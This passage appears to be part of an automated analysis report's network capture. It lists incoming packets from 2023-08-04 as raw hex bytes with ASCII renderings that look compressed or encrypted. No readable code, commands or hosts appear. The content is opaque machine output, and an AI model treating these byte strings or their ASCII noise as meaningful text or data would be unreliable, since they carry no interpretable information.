c1 ff b8 b2 de ed ba cd 0e 6c bd 30 69 1f 5c b6 48 32 f6 7b 34 22 4e 61 09 2b 77 25 cc 56 86 30 42 69 0f ab b8 e2 09 2b 90 31 47 f0 3d 20 9f a1 96 83 15 67 5a 3f c3 3f dc 87
                                                                                      Data Ascii: %VCsF'zKm^v`2#R6I=j1-'iK{NI+Y>Myl5!ezIt@GM=Qp[vtE#br*!<\x)%rTYbgV>ON"\eb&$U1l0i\H2{4"Na+w%V0Bi+1G= gZ??
                                                                                      2023-08-04 16:48:40 UTC1810INData Raw: 9d a0 d9 0f 68 b8 00 87 bc 60 6b 5b 0d 41 ff 3a d8 f0 5d d6 c5 e1 a1 76 4e 47 f5 6d 32 24 5f 5e 37 07 4a de 7c ac a1 e9 02 15 9a 37 45 52 7c bf 7e cc a9 21 cd 82 34 b8 88 b0 c8 d3 fa 54 b3 48 48 79 68 00 1c 83 72 11 6b df c1 33 01 f2 e7 4b 86 c0 11 7d 42 b1 f3 a8 00 84 58 18 11 dd 8e 28 6c 08 f9 a1 75 08 a4 f5 9b 73 a6 5c 69 0a a2 ea d4 1c ec 91 49 b9 1b e1 bf d6 86 fd d0 af 03 3a e8 00 08 41 1a 4f 50 80 46 32 4d b8 59 61 23 c0 1c b7 f8 58 98 80 33 cf 9e 26 51 73 a4 93 a8 a1 8d bd c1 67 d9 1b 3b 3f 8c 95 1f e1 9d 86 21 16 bf 88 bb 17 80 a9 09 68 5f a0 0d 33 3f 97 a4 99 34 4d ee a8 c1 63 d2 80 e6 f8 f6 0e fa 73 a3 4f 5c 49 a1 50 8f 4b 0b da 4c c7 bc c3 59 3f cb f8 fd 65 1c 0f 5c 1c c1 32 0d 1d 35 e1 71 de 91 83 48 51 43 31 8a a3 09 de 29 11 b8 c8 76 80 0d
                                                                                      Data Ascii: h`k[A:]vNGm2$_^7J|7ER|~!4THHyhrk3K}BX(lus\iI:AOPF2MYa#X3&Qsg;?!h_3?4McsO\IPKLY?e\25qHQC1)v
                                                                                      2023-08-04 16:48:40 UTC1814INData Raw: 72 95 c4 52 6c dd 9a 14 3e dc 61 eb 2a 2b 4d 26 6a 75 b4 46 16 e7 cc 3d d1 b2 f7 5f e5 3e 77 7d 39 42 97 a1 8f 14 32 9f 1b 82 bf 9b fd 63 5c 39 d0 81 d5 a3 8a 49 cb af 6b 10 1f 83 e0 90 b1 14 f2 67 37 3c af 41 8b 7d e8 06 a3 b6 35 b9 87 e4 7c 5a f1 91 86 19 3a 84 7f 27 bb 28 19 cb 0d 0d aa 22 b7 9e 9a 86 3b ae ff b4 6e 29 6f 9c 57 bf 52 7b 5e 3a 21 90 f2 3c c2 cc d6 16 1d c9 1b 9a e7 84 0c 18 40 10 b6 f8 fe c9 8b 4a 79 fc c6 02 2f bc 5e 66 04 91 ba 12 7f ee e4 a9 9d c1 d3 92 1a 46 06 e7 bb 62 d2 07 6d 76 88 8d 17 f6 6c 93 c1 ce 68 40 c8 7d 00 03 21 58 2f 67 01 71 f2 ee e1 b8 c0 51 5a ac 17 ec f7 67 d0 18 ad 45 ef 35 8a fd fd ea 51 49 c7 a0 21 5d 0f 3d bb f3 c6 45 f7 12 4d 46 54 4a f6 40 9c ed 3b 11 8f 72 d4 80 3e 7a 72 43 3b 25 d7 fd f5 44 ff 69 1c b9 a3
                                                                                      Data Ascii: rRl>a*+M&juF=_>w}9B2c\9Ikg7<A}5|Z:'(";n)oWR{^:!<@Jy/^fFbmvlh@}!X/gqQZgE5QI!]=EMFTJ@;r>zrC;%Di
                                                                                      2023-08-04 16:48:40 UTC1818INData Raw: f4 ed f4 44 7b c5 4d e5 69 bf 9e 0f df 5b 81 74 ac 09 67 0f 3b e8 a1 b4 d5 bc 4c 2c c8 51 08 c9 58 41 4a 42 a6 da fc 54 67 da 4c c1 79 4e a1 3f 53 8a e0 2c 3c bc 66 11 15 b1 83 12 96 ff 50 3e ec 37 28 64 28 bc 96 07 f2 c1 fd fe 27 73 72 c9 05 05 76 e6 15 c9 a9 3e 1b ab 09 f8 44 07 c7 b1 5e 11 bf 95 8a c2 55 00 39 73 9e a8 0b 86 1e 03 12 7b 70 78 c3 c3 76 28 36 0f 57 c3 74 fd 76 f4 cb fb 98 2f d2 d9 a9 e4 aa 4b ec ac 1d 18 23 25 4a cd 4c 0b ce a5 c9 d0 cb d3 73 56 23 a6 97 59 f6 5b e4 0b 09 7e a6 5e f1 1f 74 f1 80 02 f2 c0 d3 8a e5 0a 3e d4 cb 9d 08 ef 19 b2 a2 ba 20 d6 49 9a f0 ce c5 1f 6c 12 cf 4c f7 5b 95 dd b3 f4 7d 1a c0 fa d5 d9 bf 71 10 c9 b9 eb ec 6d 0d 4a dd 65 05 ad 92 17 52 01 23 c1 03 12 3f 04 88 b9 93 2e 5a 2d 5f bb 19 3e f4 a9 26 2a 07 cc d0
                                                                                      Data Ascii: D{Mi[tg;L,QXAJBTgLyN?S,<fP>7(d('srv>D^U9s{pxv(6Wtv/K#%JLsV#Y[~^t> IlL[}qmJeR#?.Z-_>&*
                                                                                      2023-08-04 16:48:40 UTC1822INData Raw: be 5e 43 91 a1 40 6d bd 1f 35 55 9f 3d 16 9e fa 90 28 5f b2 d2 4c d3 76 60 5c f4 db 40 0a fa d2 a3 04 84 9c eb b3 0f b1 55 fc d0 86 d7 a2 ad 3c 86 ea 4c c6 7f 72 00 d1 47 5c d2 ef 3c 49 94 36 e4 cf 13 ad 2f b5 95 42 83 ad 39 24 c9 10 44 a0 71 21 c5 b9 56 db 3e c4 dc e4 ee db 8f 3e 92 c9 e8 9e 61 9c b5 02 86 77 a0 b1 05 42 55 3f 82 86 7c 64 a7 c4 57 ca 98 ff 6d e6 a5 88 60 78 b1 90 d4 e6 9a b6 a0 69 05 45 16 7c 33 df 18 c2 47 ae e4 4c 63 7f d5 84 8d 33 80 56 ef 76 96 6d f2 cb 9b 6d 8e d0 84 7f 14 00 0b 75 5c c0 6d 20 cc dd eb e3 f0 58 1d fb 48 47 cd 7e 9d ab b6 94 2e a3 f6 90 c2 b6 eb 5a 0b 0f b8 55 75 2a 87 de 91 68 1f 9c b7 52 fc f9 07 8a 1c ce 6f e1 e6 8b 98 84 75 59 88 9c 48 f7 e7 eb d6 e9 cf d0 dd 9d 44 ee d5 6b 82 25 14 cf a0 66 59 6e e3 62 0c 8e 51
                                                                                      Data Ascii: ^C@m5U=(_Lv`\@U<LrG\<I6/B9$Dq!V>>awBU?|dWm`xiE|3GLc3Vvmmu\m XHG~.ZUu*hRouYHDk%fYnbQ
                                                                                      2023-08-04 16:48:40 UTC1826INData Raw: 34 8e 3e 92 2b 9f 0b 17 33 a0 7c b0 89 36 d3 84 3c 94 30 f2 2f b5 26 c4 7c 70 0b e5 79 2c 77 1e ff 40 4b 8a da f5 65 55 bc 4e e1 b2 bb cc d5 0f 53 25 15 ef e5 9d af c4 36 1b 81 44 a9 2d 06 22 a8 19 c7 99 49 fe 28 ed d0 d2 15 de 2e 00 cc 60 01 96 29 e5 05 cd ed 74 4c 27 f0 c9 99 cf d4 c7 76 08 97 8b 02 dc fa e9 46 a9 de b7 9a 78 05 a4 8e be 1f d1 30 05 5d d1 17 41 fc 84 dc ff cd ec fa bc 72 80 e0 45 00 58 ee 40 80 1a e7 a5 0b 04 6c 58 fb a0 e2 54 08 2c 40 11 9c 12 72 32 2a a9 2e b0 6e 6c dd a5 61 fc 3a 7a 38 f0 7f 95 28 38 5a 2d 7d 05 0e 74 4f 03 70 fd dc 57 eb 85 ca 47 85 be 20 66 0e 8c f6 b3 50 62 97 3b 69 8a 94 33 38 b1 8c 33 28 15 c8 2c a3 2f 7b 9f a5 7b 8d 65 10 8a cd 8c 03 a5 e0 65 df 1f 64 10 8f 95 d3 21 5f c2 16 31 35 f2 4f de b2 34 93 3a 87 84 52
                                                                                      Data Ascii: 4>+3|6<0/&|py,w@KeUNS%6D-"I(.`)tL'vFx0]ArEX@lXT,@r2*.nla:z8(8Z-}tOpWG fPb;i383(,/{{eed!_15O4:R
                                                                                      2023-08-04 16:48:40 UTC1830INData Raw: 6c 3a 5e b4 78 76 31 bf e6 52 ad 91 60 18 d2 b5 36 84 54 38 d6 04 b1 f4 37 26 26 b1 fe 67 ea b1 de cf 5e fe ec 1f 3e 42 b5 3e 3e ab 4f fa ab e9 21 ea bb 73 5b c3 fe 48 1f bf 30 f2 93 06 b9 52 ac 28 94 28 65 7e aa bf c3 8f a7 4d 4d 18 db 86 0d 06 dd 00 87 6d 7e ad 94 bf c1 d7 f3 a7 f4 1c 32 69 5e c1 ef fb 70 62 4a 72 05 06 dc 57 ed 30 a4 46 47 c6 58 56 97 56 4b 68 c7 5b aa aa b4 02 ca f5 77 93 c2 95 38 f1 d2 72 74 8a d8 db 14 04 12 a6 20 eb 75 b5 d0 14 49 99 4b b2 b6 65 4f f9 18 5f 9a 60 b8 eb d3 7d 5e 8c b7 f8 e4 d4 04 ef a2 69 05 2b 02 6e 64 a6 31 58 ad 7a b7 f7 1a 08 72 5a 65 64 2f 67 1d 95 ba 89 a6 b0 af d1 fb b0 37 9b ca dc c1 a2 b5 0a e0 5a 3c 18 d2 da 0d 19 0e 61 7a 82 9f 51 3f ec c4 f9 ef 7c d4 65 50 0a 9f 1c 10 7f 05 d4 ee 3f 06 8f 19 05 0e f1 6c
                                                                                      Data Ascii: l:^xv1R`6T87&&g^>B>>O!s[H0R((e~MMm~2i^pbJrW0FGXVVKh[w8rt uIKeO_`}^i+nd1XzrZed/g7Z<azQ?|eP?l
                                                                                      2023-08-04 16:48:40 UTC1834INData Raw: 46 61 01 c0 06 e7 e1 75 c4 d4 0d 33 7b 3c 2a f8 95 f6 36 25 6d 24 90 5b d9 21 e6 ab e7 7d df c6 51 6f 47 4e 7d bc 67 2a 71 cb f3 53 db cb 08 b0 cc 0c 74 80 b2 04 58 c5 66 c3 7c a2 be cc c5 93 11 58 6c 57 a9 4b d3 79 27 1f 0d 62 9c 92 e2 2c 73 72 94 03 69 97 6d 31 da 32 f2 39 3e f6 d9 23 78 2c b1 33 f9 a6 01 3c f5 8e 22 55 0c fd b1 1b 34 56 9c 51 46 0d a4 48 29 92 0f a5 e2 65 a3 12 2c 7d e7 3e cf 7a c5 73 f2 4c 41 86 f1 ea 6a 01 60 a5 30 95 0e e7 5b 70 b8 9b 60 f7 42 b0 60 48 72 fe cd 28 c9 e9 7e 4b b1 e2 1d ca 9a 21 a2 5f 4a 19 3f f8 f3 7d 14 54 e1 e8 78 91 e2 00 68 aa 10 74 a7 74 b4 db 62 10 8c 20 5a 68 22 e9 d4 db 3d 13 4c 45 0b 17 33 89 6d 0a 10 51 40 ab 8f 18 8f 42 29 90 7e d5 f7 25 93 04 7c 64 e8 49 cc 89 67 e9 f7 bf 2b ff ef 08 3d e3 50 3e bd 89 a6
                                                                                      Data Ascii: Fau3{<*6%m$[!}QoGN}g*qStXf|XlWKy'b,srim129>#x,3<"U4VQFH)e,}>zsLAj`0[p`B`Hr(~K!_J?}Txhttb Zh"=LE3mQ@B)~%|dIg+=P>
                                                                                      2023-08-04 16:48:40 UTC1838INData Raw: e5 02 ec 59 a0 f6 c3 90 72 94 32 35 c4 33 24 fe 10 7d e6 68 a5 51 65 2d 56 da e2 3e 71 53 01 91 f7 a2 a4 8f e9 24 2e 83 e9 6a 01 8b 65 9f af bd bc f6 27 68 49 ec ca d1 e3 3c a3 7e 12 b5 4c 0c 5e cd a8 8c fd 7c 3c 46 56 25 77 97 84 3a 0e 8e 3f 80 15 e9 44 70 8f 47 98 ba 79 2e e4 e0 bd 60 d2 b6 9b 84 b7 c7 0e ef f0 fb 39 95 49 7f 3c 2e d8 ec 1c a3 b0 b5 e9 0e db 04 5d e6 b2 e6 e6 c3 b5 0c 8d a8 c1 6e fe 5e 4f 21 6f be 52 dc 81 49 13 c8 5f 43 29 95 e2 a0 6e 71 28 1b 76 9a 0d 92 7b 93 88 3b 46 a0 43 6c b2 1a 20 67 40 89 a5 50 29 32 4b 16 04 31 76 38 3f b4 74 45 11 aa 1c 75 46 be 3d df eb 94 d2 d7 9f 28 90 a9 6c 7b a9 96 be dd 11 34 48 23 20 96 d2 68 13 47 78 ad 7a cd e6 ad bb 49 21 a9 6c 1c 38 03 ed 6d f9 9b 79 57 5e c1 2b 44 da 1c d3 38 fe dc 4d b9 ce 0d 6f
                                                                                      Data Ascii: Yr253$}hQe-V>qS$.je'hI<~L^|<FV%w:?DpGy.`9I<.]n^O!oRI_C)nq(v{;FCl g@P)2K1v8?tEuF=(l{4H# hGxzI!l8myW^+D8Mo
                                                                                      2023-08-04 16:48:40 UTC1842INData Raw: 3d 49 f9 45 b4 2d 29 9f 2c 4f 04 b9 40 b6 3e f1 f5 e3 28 23 0f 19 80 d6 cd e9 f3 69 b5 e1 f4 8c 43 de 18 34 6a 51 88 cb c2 ab da 40 6f a2 81 1b 34 8b 89 b6 87 28 e7 e0 f0 b8 cd 98 9f 4c 9f 74 0e 57 38 8f 0e 5e 74 3b 6e c4 06 ce e0 6b fb 75 2b da 51 3f 2b b9 55 58 d3 db c4 cc b8 e9 ac 87 54 11 24 ba 0f 11 9c 48 d3 df 23 9f 79 1e 43 5d 1d 25 71 d7 ad 49 a1 c9 94 cb ea 23 d7 af 0b ec a2 02 8f 47 ff 66 3f 27 f0 d8 b5 1c 3a 56 7f 07 f8 64 60 41 ce ae 26 bc 36 a7 d0 89 92 1d 9b 43 83 f9 1a 0a a7 aa 4c 97 7f dc 5b 7a 80 b6 f3 83 31 b7 ea 17 fd a3 1c ed c1 dd e2 e4 24 79 2c c1 27 47 c1 c0 5d 2c 24 b9 ff 43 5d 3b ae 95 53 e3 ed d4 d0 77 7e 38 b4 48 05 ea 88 8a ac e6 5f 0d 9f 6f a7 81 c4 35 7f da 77 7c 23 f7 1d 2a b4 25 75 1c 30 39 8f fe f9 a3 43 13 63 51 7b d3 f5
                                                                                      Data Ascii: =IE-),O@>(#iC4jQ@o4(LtW8^t;nku+Q?+UXT$H#yC]%qI#Gf?':Vd`A&6CL[z1$y,'G],$C];Sw~8H_o5w|#*%u09CcQ{
                                                                                      2023-08-04 16:48:40 UTC1846INData Raw: ed 51 00 77 dc e4 f2 5c 38 33 55 af 79 35 4b c3 9a f3 ea e2 f8 fc ed fa b4 60 a8 2c 86 49 59 af 6f 74 f2 5a eb 67 ce 7f 1b ad 3a 26 6f c6 a0 1f 2e 8f 91 ef aa 3c e0 56 6f 44 08 da ad f0 13 6f b0 d7 cf 98 44 6e 81 4e f9 04 20 89 83 11 b5 cc 71 97 01 3a 36 d5 3f 55 05 a7 6e 6e 23 be 84 3d 1e be 19 2c 42 5d 3e 39 0b b6 d6 2b 74 2c 37 99 0c be 6a 8c dc 3d c3 6f fa b3 75 e7 70 f8 bc 3e 69 9c 5a 80 b7 70 94 8a a0 88 89 0e 59 3c 43 3f a6 c0 f4 98 05 d3 3f 85 e1 ee 9c 73 5c a5 54 72 a5 9f 31 06 42 bc c5 b0 e6 4d b8 34 29 06 a1 48 db 95 2e 76 55 14 26 13 1b 16 47 21 89 10 5e 0c 78 fe 04 95 d1 c5 d3 9b 78 9e ac 01 52 e1 e4 01 31 b0 35 97 17 d0 79 a1 07 7d a7 4d 52 07 b3 7e 38 5c f3 d4 0a 21 f9 9e 72 0a 26 17 0f 51 63 2a a9 74 5f 8e aa 65 5e 58 11 f3 d9 5d dd 6b b6
                                                                                      Data Ascii: Qw\83Uy5K`,IYotZg:&o.<VoDoDnN q:6?Unn#=,B]>9+t,7j=oup>iZpY<C??s\Tr1BM4)H.vU&G!^xxR15y}MR~8\!r&Qc*t_e^X]k
                                                                                      2023-08-04 16:48:40 UTC1850INData Raw: f8 6a cd 3b 57 ea 9f 12 44 1c a1 49 93 47 8c 1c 52 28 7f a4 e1 1d d9 44 cf f2 87 84 f0 4a 32 00 ef 78 b3 df 55 58 ad 89 4e ad a3 bb af 54 c8 60 4f 64 25 49 6a 8d 34 b6 f1 e7 ab 67 26 b3 33 30 87 40 4e 67 a1 83 5b 9f 25 dd de 4b f5 e8 ae 0b 5b 8c 44 36 01 60 b7 60 a8 d3 7b d8 59 7d b1 22 b6 26 c8 f1 e9 73 49 1a a4 10 7a c1 30 27 d2 43 31 af a4 20 d1 bc c9 fe 31 b2 f5 7d 48 d8 30 5f 3d 39 09 8e bf a7 1a 78 fe 5c 8f e8 7c 21 a2 db a0 7b b0 ae 7f 58 c3 01 9f 15 8b ce 92 25 c3 97 76 e5 25 44 d5 b8 ca 0c 28 a6 27 da 7f d3 20 75 0a 5f 5b ba 62 ed 7a 9f 03 07 dc fe c5 67 b1 19 e6 8b 3a 11 07 eb 6c a0 19 35 58 59 2c 2e 64 48 7c fe 27 92 2c 0e eb 25 6c 4e f3 40 d3 38 90 02 a5 10 c5 34 cb c9 2b 01 1a 69 b0 31 f1 6d a2 bd 49 f3 74 d2 6d 0c f3 54 2a ec bc 09 93 e4 48
                                                                                      Data Ascii: j;WDIGR(DJ2xUXNT`Od%Ij4g&30@Ng[%K[D6``{Y}"&sIz0'C1 1}H0_=9x\|!{X%v%D(' u_[bzg:l5XY,.dH|',%lN@84+i1mItmT*H
                                                                                      2023-08-04 16:48:40 UTC1854INData Raw: b7 e3 82 52 7c 35 71 30 ab 14 65 3f 38 a3 f2 20 18 39 8e 30 19 53 5b d3 8a 17 77 82 d6 51 8c f5 20 9e 72 62 b1 ae 56 d2 3f 81 2c 21 27 26 bb 91 a8 cf 00 3b 29 2e e1 ae ca ff c8 a8 eb 89 8e 90 3c d3 5a 10 bf 6f 30 87 3c 62 a3 28 a1 28 22 4c ee 39 b7 37 ee a5 c6 e9 10 a5 8a 95 20 cd 80 de 22 c2 67 ed 84 32 47 a8 e9 b3 d0 f0 be 0a 94 6b 2e 36 95 ba 7a 55 b6 f8 9f 2c 1a f7 57 0b 28 bc 56 de 4b e6 0d ce f8 6b c2 8f 51 f8 c1 a8 aa 64 fb 0c 9e ca a2 6d 8e ee de da 32 11 42 58 d3 91 bf 6f ea a4 49 72 c2 30 cb b8 3c e5 cb 29 f9 70 3e 31 29 48 16 c3 d5 10 c8 88 ff 07 c8 32 bf 72 5d a0 bb 6c f2 ed 73 dc e9 be 46 82 bb 7d 73 c8 fb 91 29 c9 3a 45 91 52 6c 28 27 9f fa 4a 85 68 07 9e 33 97 f4 a2 6b b4 6d 76 e2 f3 8a 54 67 d0 7c 70 df 86 6a 16 c6 cb 8a 8f ae e2 f4 e1 34
                                                                                      Data Ascii: R|5q0e?8 90S[wQ rbV?,!'&;).<Zo0<b(("L97 "g2Gk.6zU,W(VKkQdm2BXoIr0<)p>1)H2r]lsF}s):ERl('Jh3kmvTg|pj4
                                                                                      2023-08-04 16:48:40 UTC1858INData Raw: 42 9e 04 2a ed 01 e2 48 e1 bf ac 3d 15 a4 80 d4 0c 59 0a 0c 43 22 f9 7f 1d 92 a7 47 10 7a 54 d5 04 72 2f fd 35 2c 95 41 e3 cb 3d e3 ef c1 4e 23 ae 75 72 0c a4 bf 3b 98 47 60 15 11 91 5b 40 a6 11 67 35 ca 1c 85 e8 47 04 9a 64 0b 98 bb 62 44 69 ed 9f b3 43 54 80 79 4e 13 ea 5a fd e4 a8 69 f7 69 20 6b 59 37 24 d7 31 8e 89 82 dc e4 65 68 8f 74 34 4b 50 67 c9 7d 05 af 3b 08 b5 f2 17 c9 58 c9 c0 69 85 fe f6 ed 78 f6 a1 8b 07 9d a6 8c b1 6f 00 9d 19 5c a3 9b 22 26 c9 37 57 28 b2 d9 62 ef 8b 54 01 28 6d 53 9d 1e 1b 0c 52 ca 2e d1 a1 30 91 19 1b 0c ab b8 f2 db 84 f1 c3 d9 70 f7 11 38 98 f8 ee b2 74 3b 94 88 fd 74 3a 56 e2 96 ff b6 d4 56 15 a0 63 64 89 ae de 00 81 e5 aa 7c 62 91 20 b6 46 9e d6 1d 33 c8 36 35 be 27 22 82 73 60 4d b6 fa 34 e2 44 b1 2f 95 57 50 51 43
                                                                                      Data Ascii: B*H=YC"GzTr/5,A=N#ur;G`[@g5GdbDiCTyNZii kY7$1eht4KPg};Xixo\"&7W(bT(mSR.0p8t;t:VVcd|b F365'"s`M4D/WPQC
                                                                                      2023-08-04 16:48:40 UTC1862INData Raw: 34 20 e7 36 52 3b 14 1b de 2e ec 41 f0 20 18 24 92 cb b8 45 0d fa 5c 56 5a 61 7b 4a 88 56 81 9d 19 8a 49 eb c3 02 bc f4 1d 58 a2 41 65 ad a9 5e f0 a1 50 c4 b8 62 ef 54 f2 1c fe 24 09 f8 dd d0 e4 1a b6 0f 0b e4 27 11 7f 30 e8 9a 32 db 88 e5 b7 93 66 51 33 dc 83 2f ff 85 b4 17 72 d7 7d bc 9b cc e5 b4 65 2c d9 11 0e e5 f4 a0 06 9b 5f c8 30 c0 e6 81 aa 13 ab d7 07 c9 61 f3 27 9c 9e 82 8b a8 8a b3 a6 c2 dc 58 1f 54 ee e5 a7 9e 31 c8 56 5d 05 c8 29 a0 1e 9d 50 e1 f9 03 66 ec d2 49 bd 2a 51 ad b2 3c c2 83 6c 69 95 30 f1 bf 74 78 3c 17 40 69 9d 11 9f e9 72 bb 77 50 48 32 06 f6 2d ca 65 02 01 d5 4d 70 b4 fa ce 98 73 84 ae 89 4f e3 cb e4 ed 1e 29 40 8a 5c 72 c1 ad 8a f2 d1 05 70 c8 4a 43 25 b3 a8 ce 0b 1e de 61 d3 ed 42 a1 6c f2 b9 73 da 34 03 ce c9 9f f2 23 c4 ac
                                                                                      Data Ascii: 4 6R;.A $E\VZa{JVIXAe^PbT$'02fQ3/r}e,_0a'XT1V])PfI*Q<li0tx<@irwPH2-eMpsO)@\rpJC%aBls4#
                                                                                      2023-08-04 16:48:40 UTC1866INData Raw: 42 57 a2 7b 10 8e 98 c8 c9 91 8d 97 24 ed f6 6b 6d 42 e0 01 7f cd 41 1f 2e 66 b7 15 a5 2b 82 89 3c eb 3a 39 33 ea d2 c1 95 19 e8 6d e6 31 0d 90 cc 27 62 dc fd 93 b2 28 47 7a c5 50 34 1b cb f0 d2 90 50 57 f9 be ea f2 99 cb 8a da 8c bc 79 7e 65 3a b8 25 b7 7c ef fe c7 08 47 5a bb c3 05 7b 03 97 dc 56 6b 02 fb 7c d9 7b 39 ba f9 3f 5e 71 a2 7b ff 58 94 65 5f 4c b3 48 9c 66 ed e3 a1 f0 f0 41 5b 81 08 7d 17 a8 7e de ba fa 29 04 47 28 1f 1a ac 19 0a 1e 67 58 ca ca 07 10 e3 a1 16 32 bc 04 7a 94 60 c6 87 c2 bf 87 cb 6e 5e 60 44 11 1a b8 90 5c 0b 31 36 58 ee 07 25 bd 9c 44 04 a7 f4 e6 96 38 8a 2c b7 08 f6 b1 88 ec e0 05 1a b0 00 d1 0f 6b 5b 84 5e 27 8f c1 82 de aa 96 22 80 4d 63 12 7a 77 16 7c 19 c5 83 b9 94 64 7f 8f 26 88 08 eb 9e d6 49 fa d1 85 81 9c f2 2f 06 04
                                                                                      Data Ascii: BW{$kmBA.f+<:93m1'b(GzP4PWy~e:%|GZ{Vk|{9?^q{Xe_LHfA[}~)G(gX2z`n^`D\16X%D8,k[^'"Mczw|d&I/
                                                                                      2023-08-04 16:48:40 UTC1870INData Raw: f4 5f 3f 62 cf 1c 0f 02 35 81 06 68 ac 54 6b 93 8d 03 c3 85 a5 52 e3 48 24 b1 b5 30 43 a2 74 0c 85 b5 bb 8c 60 10 ae ce 64 2b 19 69 11 eb ab 5a 51 cc 15 fe 33 b3 69 53 b6 4e f2 d0 38 27 6a d8 3b e1 ce 45 59 72 93 42 4b 9b 80 16 27 f1 cd 01 13 ac 05 dd f2 95 9f 71 2e e7 5d 7a a6 2d 0e 6c 7a 73 cd ca 96 40 36 04 8f 5b f6 70 f3 87 5d 8b b4 4b 9c 30 b7 c5 05 12 e9 03 b5 1b fe 13 9a 06 00 5d 51 70 f8 49 65 55 67 30 4d 02 30 e0 78 2c 92 c1 79 a2 a4 ce df 57 57 06 98 6e b9 81 a2 0d 1a ff 74 4f 21 67 a2 4e bd bc ab af b5 e1 5b e7 48 5c 24 ab ac f4 dc 45 81 49 df 5b 10 5e e3 6e 8e b3 40 a8 81 57 bd bb 34 fb b8 5e d2 18 24 a0 4f 92 3e 70 0c 40 f8 36 4d e4 9f 54 4b 88 1c 45 85 ad 10 04 db 79 56 5b 97 dc bc 32 b6 30 76 32 58 d2 58 93 7e 67 48 7b 0b 2c 8a 68 05 32 69
                                                                                      Data Ascii: _?b5hTkRH$0Ct`d+iZQ3iSN8'j;EYrBK'q.]z-lzs@6[p]K0]QpIeUg0M0x,yWWntO!gN[H\$EI[^n@W4^$O>p@6MTKEyV[20v2XX~gH{,h2i
                                                                                      2023-08-04 16:48:40 UTC1874INData Raw: 80 29 0c 32 e8 57 14 63 ef 7c 13 95 a0 46 7d 24 bb 4a 3d 8d f4 ca d0 b0 36 76 34 a5 78 ed 42 78 80 4f a3 b7 2f 02 8a 03 1c bb 09 79 6a 3e 7b b9 69 b2 ef 45 b8 e0 f8 86 4d 62 50 83 74 32 4b da e5 7c 69 54 cf 7d 2d 9a f1 64 24 a2 40 6a 42 79 16 55 86 3d 18 12 32 05 b0 f0 b3 8b db 33 02 04 a1 88 5a e1 75 8a d6 ff ce fb 0d 4a 9c ce 73 b7 bf cf 4b d0 1c bc 79 56 4f 9b 31 c7 d9 c9 87 14 2a c6 d4 01 81 8f 08 02 49 57 b4 c5 ef 2f 79 d6 2c f1 df fd ca 26 d5 86 c8 a0 25 2e cd a6 37 a3 cc ed c7 82 89 db be 3d 76 10 d2 9a a2 2f 65 c7 9a 3e 4c 43 6f 1a 27 70 1c 27 59 3c a4 f6 08 72 9e c3 fd 2b a3 bd 33 11 2b 0e 7b 82 bd 4f 2b f7 c1 78 ef 91 89 0e 76 74 6e 71 6f 11 0b ee 15 f0 74 37 0f 86 88 e3 ed dc f8 e1 72 3d 6a 52 08 57 79 14 03 17 22 92 99 c8 f3 b8 b7 5b 25 ca f0
                                                                                      Data Ascii: )2Wc|F}$J=6v4xBxO/yj>{iEMbPt2K|iT}-d$@jByU=23ZuJsKyVO1*IW/y,&%.7=v/e>LCo'p'Y<r+3+{O+xvtnqot7r=jRWy"[%
                                                                                      2023-08-04 16:48:40 UTC1878INData Raw: c8 b9 c8 1e 74 4c 47 71 22 bd 06 69 f9 38 0d 1f a8 1f a9 4c 8a 9e c7 68 e1 68 99 9b ff e9 44 7a 59 68 7a 7d 03 f7 b8 12 79 31 33 69 ec 4f e0 d0 97 7b 9b ed 2b 06 89 d9 d9 bd 11 df ce 4d 60 c8 22 ca 24 6e 11 a4 21 d2 21 b7 c8 3c 99 76 77 1c ff c9 ef 33 c6 98 cf e5 3c 03 ed 14 fb cb 92 72 57 c1 2d 30 5e c0 5b 25 cc d5 9e 96 6f 86 7a 45 69 19 6f c8 20 ba 65 bc 9e cc b1 4a 02 83 89 62 38 e8 d2 85 c5 1c 48 02 90 0d 45 d1 e6 7a f3 75 38 4f 35 7e 15 33 a6 84 12 7d e3 d4 22 35 0e a1 f4 f0 51 68 4c 10 65 8f 0a 60 4e 50 e6 84 dc 96 bc 9b 4d a0 ca fe a9 89 9b 7d 32 c3 91 f2 64 dc 37 0b de f9 88 09 74 50 da 17 78 80 5d 3c 12 0b 85 99 e5 33 46 13 d2 05 a3 09 da de b1 e4 4c 72 ce b3 40 33 eb 21 8c 4a 27 a5 31 6d 08 f0 ff 1c 0f 73 79 16 cd 38 2e eb 67 77 02 4f f4 4b 6b
                                                                                      Data Ascii: tLGq"i8LhhDzYhz}y13iO{+M`"$n!!<vw3<rW-0^[%ozEio eJb8HEzu8O5~3}"5QhLe`NPM}2d7tPx]<3FLr@3!J'1msy8.gwOKk
                                                                                      2023-08-04 16:48:40 UTC1882INData Raw: 21 ad e3 56 d7 8d 7f 62 7b 7c 71 52 4a cb 3f 29 cc 89 53 b4 79 e1 50 22 26 86 29 6e b9 0c 43 b6 76 56 b7 79 4f ee 68 e4 fb 01 e6 b3 64 ad 80 f8 7e 7e 75 4a cd 63 7c 67 b4 2f d1 2b 90 56 f4 92 2d 2f e2 3f 1d a9 32 34 7a a1 46 bb 2b 85 66 4e 33 a6 7c 55 79 c9 ba 94 5f 56 a4 d4 a7 00 0d d9 b6 b0 be f8 17 ae 51 ab 25 dd f5 9d d8 b5 bc 5e bb ed 25 ea 02 97 73 20 1f f0 45 6e eb 66 85 b6 38 3b 11 6d 5d fa 6f b5 e0 b8 af 65 af 0b 0f 5e f2 f3 46 67 2b 58 04 f2 f3 62 59 6c a4 39 85 e4 75 2f fb 7e 53 6d 9f cd c4 0b 9e 0d 35 f2 dd fd ea 84 63 45 ef 51 37 7b 8e fa ea 53 cf 42 1b 8f a0 fb 54 73 2a d9 a9 b0 f7 18 1d d8 79 35 f2 63 72 e0 a8 fe 81 5b 66 a1 7b cf ba 9e 8c e7 da 0a a6 bb d6 34 aa a3 76 28 86 a7 00 9b 24 03 34 9a 60 52 e5 1e 6f 7e 1b 8a 78 16 48 32 64 20 f1
                                                                                      Data Ascii: !Vb{|qRJ?)SyP"&)nCvVyOhd~~uJc|g/+V-/?24zF+fN3|Uy_VQ%^%s Enf8;m]oe^Fg+XbYl9u/~Sm5cEQ7{SBTs*y5cr[f{4v($4`Ro~xH2d
